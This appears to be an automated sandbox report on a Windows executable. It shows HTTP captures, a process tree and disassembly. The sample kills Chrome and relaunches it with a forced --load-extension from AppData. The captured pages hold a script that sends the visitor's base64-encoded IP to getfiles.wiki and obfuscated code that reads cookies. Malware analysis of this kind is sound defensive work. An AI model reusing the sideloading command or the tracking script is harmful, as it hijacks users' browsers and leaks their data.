                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              2023-06-12 17:07:05 UTC7INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 78 38 77 55 43 70 65 61 74 4e 4e 43 65 4f 6e 73 6f 6b 54 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                              Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Zx8wUCpeatNNCeOnsokT1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                              2023-06-12 17:07:05 UTC8INData Raw: 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65
                                                                                              Data Ascii: y:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this se
                                                                                              2023-06-12 17:07:05 UTC9INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.2.34970238.128.66.115443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:06 UTC9OUTGET /r.php?key=pvwarw3 HTTP/1.1
                                                                                              Host: exturl.com
                                                                                              Connection: keep-alive
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-User: ?1
                                                                                              Sec-Fetch-Dest: document
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:06 UTC9INHTTP/1.1 302 Found
                                                                                              Server: nginx/1.22.0
                                                                                              Date: Mon, 12 Jun 2023 17:07:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: uclick=usj2pmqefe; expires=Tue, 13-Jun-2023 17:07:06 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                              Set-Cookie: uclickhash=usj2pmqefe-usj2pmqefe-bzfe-0-qdi4-hqbl-hqwj-9564be; expires=Tue, 13-Jun-2023 17:07:06 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                              Location: https://getfiles.wiki/redirect.php
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              2023-06-12 17:07:06 UTC10INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.2.349704188.114.97.7443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:06 UTC10OUTGET /redirect.php HTTP/1.1
                                                                                              Host: getfiles.wiki
                                                                                              Connection: keep-alive
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-User: ?1
                                                                                              Sec-Fetch-Dest: document
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:06 UTC10INHTTP/1.1 200 OK
                                                                                              Date: Mon, 12 Jun 2023 17:07:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              vary: Accept-Encoding,User-Agent
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VW7jP80ZVnnMMlhxHVl22TRfgjKEJsiROZz2rH1sBI9SD9WbfqyE1lII8s%2FcMQwTMNBKIbem5CeRT13FHIPlmqe2rw2rJtlM5DP1zbqdIBoch45fmclAj87HvVYEUzkv"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b02d19a63669-FRA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2023-06-12 17:07:06 UTC11INData Raw: 31 32 36 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 49 50 28 6a 73 6f 6e 29 20 7b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 22 2b 62 74 6f 61 28 6a 73 6f 6e 2e 69 70 29 3b 0d 0a 20 20 20 20 65 78 69 74 28 29 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 69 70 69 66 79 2e
                                                                                              Data Ascii: 126<script type="application/javascript"> function getIP(json) { window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip); exit(); }</script><script type="application/javascript" src="https://api.ipify.
                                                                                              2023-06-12 17:07:06 UTC11INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              6192.168.2.349705173.231.16.76443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:09 UTC11OUTGET /?format=jsonp&callback=getIP HTTP/1.1
                                                                                              Host: api.ipify.org
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://getfiles.wiki/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:09 UTC12INHTTP/1.1 200 OK
                                                                                              Content-Length: 31
                                                                                              Content-Type: application/javascript
                                                                                              Date: Mon, 12 Jun 2023 17:07:09 GMT
                                                                                              Vary: Origin
                                                                                              Connection: close
                                                                                              2023-06-12 17:07:09 UTC12INData Raw: 67 65 74 49 50 28 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 37 22 7d 29 3b
                                                                                              Data Ascii: getIP({"ip":"102.129.143.77"});


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              7192.168.2.349708188.114.97.7443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:09 UTC12OUTGET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= HTTP/1.1
                                                                                              Host: getfiles.wiki
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              Referer: https://getfiles.wiki/redirect.php
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:10 UTC13INHTTP/1.1 200 OK
                                                                                              Date: Mon, 12 Jun 2023 17:07:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              vary: Accept-Encoding,User-Agent
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xi2Ir5KTI1HULRNRultxXyBlgJhClKZ1MLWFfB9qQgLzO6MFXf30yc4XA3gRd8CawKdIkPqJnzpRS7xHl%2Bo7rCXla7JgRPr7UYaXpyssuM%2B1GMMDjvjxqairRFcdTMWu"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b0410b17bb50-FRA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2023-06-12 17:07:10 UTC13INData Raw: 64 66 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30
                                                                                              Data Ascii: df0<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body { background-color: #0000
                                                                                              2023-06-12 17:07:10 UTC14INData Raw: 72 26 26 28 72 3d 22 75 63 6c 69 63 6b 22 29 3b 76 61 72 20 63 2c 74 2c 75 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                              Data Ascii: r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){ret
                                                                                              2023-06-12 17:07:10 UTC15INData Raw: 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 72 29 7d 29 29 2c 6f 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2c 72 29 7d 29 29 3b 72 65
                                                                                              Data Ascii: "),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(document.referrer,r)})),o=e((function(){return n(document.location.search,r)}));re
                                                                                              2023-06-12 17:07:10 UTC17INData Raw: 30 38 37 38 37 26 31 30 31 22 20 61 6c 74 3d 22 77 65 62 20 6c 6f 67 20 66 72 65 65 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 48 69 73 74 61 74 73 2e 63 6f 6d 20 20 45 4e 44 20 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                              Data Ascii: 08787&101" alt="web log free" border="0"></a></noscript>... Histats.com END --></html>
                                                                                              2023-06-12 17:07:10 UTC17INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              8192.168.2.34971138.128.66.115443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:10 UTC17OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                              Host: campaignkeepy.buzz
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:10 UTC18INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.22.0
                                                                                              Date: Mon, 12 Jun 2023 17:07:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              2023-06-12 17:07:10 UTC18INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              9192.168.2.34970938.128.66.115443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:10 UTC17OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                              Host: campaignkejfcv.buzz
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:10 UTC18INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.22.0
                                                                                              Date: Mon, 12 Jun 2023 17:07:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              2023-06-12 17:07:10 UTC18INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:19:07:01
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              Imagebase:0x1000000
                                                                                              File size:209776 bytes
                                                                                              MD5 hash:0C0A3D01C45F66056D607BBAD486B39B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low

                                                                                              Target ID:1
                                                                                              Start time:19:07:02
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
                                                                                              Imagebase:0x7ff614650000
                                                                                              File size:2851656 bytes
                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:2
                                                                                              Start time:19:07:02
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline: /IM chrome.exe
                                                                                              Imagebase:0xc20000
                                                                                              File size:74752 bytes
                                                                                              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:3
                                                                                              Start time:19:07:02
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff745070000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:4
                                                                                              Start time:19:07:03
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8
                                                                                              Imagebase:0x7ff614650000
                                                                                              File size:2851656 bytes
                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:5
                                                                                              Start time:19:07:04
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
                                                                                              Imagebase:0x7ff614650000
                                                                                              File size:2851656 bytes
                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:6
                                                                                              Start time:19:07:05
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8
                                                                                              Imagebase:0x7ff614650000
                                                                                              File size:2851656 bytes
                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:7
                                                                                              Start time:19:07:15
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline: /F /IM chrome.exe /T
                                                                                              Imagebase:0xc20000
                                                                                              File size:74752 bytes
                                                                                              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:8
                                                                                              Start time:19:07:16
                                                                                              Start date:12/06/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff745070000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:22.2%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:5.8%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:23
                                                                                                execution_graph 13340 1002b01 13345 1002cc1 13340->13345 13346 1003582 __freefls@4 78 API calls 13345->13346 13347 1002cc9 __IsNonwritableInCurrentImage 13346->13347 13348 1002c29 653 API calls 13347->13348 13349 1002cec 13348->13349 13350 1003101 13353 1003d36 13350->13353 13354 10034ef __getptd_noexit 69 API calls 13353->13354 13355 1003112 13354->13355 13499 1006350 13509 10062d4 13499->13509 13502 100637b setSBCS 13503 1002b7c ___convertcp 5 API calls 13502->13503 13504 1006533 13503->13504 13505 10063bf IsValidCodePage 13505->13502 13506 10063d1 GetCPInfo 13505->13506 13506->13502 13508 10063e4 _memset __setmbcp_nolock 13506->13508 13516 100609d GetCPInfo 13508->13516 13526 1004545 13509->13526 13512 1006311 13514 1006316 GetACP 13512->13514 13515 1006303 13512->13515 13513 10062f3 GetOEMCP 13513->13515 13514->13515 13515->13502 13515->13505 13515->13508 13517 10060d1 _memset 13516->13517 13525 1006183 13516->13525 13581 10098d2 13517->13581 13521 1002b7c ___convertcp 5 API calls 13523 100622e 13521->13523 13523->13508 13524 1009d05 ___crtLCMapStringA 104 API calls 13524->13525 13525->13521 13527 1004558 13526->13527 13533 10045a5 13526->13533 13528 1003568 __getptd 69 API calls 13527->13528 13529 100455d 13528->13529 13530 1004585 13529->13530 13534 1005f94 13529->13534 13530->13533 13549 1006230 13530->13549 13533->13512 13533->13513 13535 1005fa0 __ioinit 13534->13535 13536 1003568 __getptd 69 API calls 13535->13536 13537 1005fa5 13536->13537 13538 1005fd3 13537->13538 13539 1005fb7 13537->13539 13540 1005cb2 __lock 69 API calls 13538->13540 13541 1003568 __getptd 69 API calls 13539->13541 13542 1005fda 13540->13542 13543 1005fbc 13541->13543 13565 1005f56 13542->13565 13547 1003a2d __amsg_exit 69 API calls 13543->13547 13548 1005fca __ioinit 13543->13548 13547->13548 13548->13530 13550 100623c __ioinit 13549->13550 13551 1003568 __getptd 69 API calls 13550->13551 13552 1006241 13551->13552 13553 1006253 13552->13553 13554 1005cb2 __lock 69 API calls 13552->13554 13557 1006261 __ioinit 13553->13557 13561 1003a2d __amsg_exit 69 API calls 13553->13561 13555 1006271 13554->13555 13556 10062ba 13555->13556 13558 10062a2 InterlockedIncrement 13555->13558 13559 1006288 InterlockedDecrement 13555->13559 13577 10062cb 13556->13577 13557->13533 